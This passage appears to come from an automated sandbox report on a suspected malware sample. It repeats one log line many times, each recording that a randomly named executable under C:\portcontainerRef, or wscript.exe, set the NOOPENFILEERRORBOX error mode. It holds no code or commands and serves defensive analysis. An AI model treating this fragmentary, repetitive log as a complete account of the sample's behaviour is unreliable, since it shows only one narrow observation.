            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
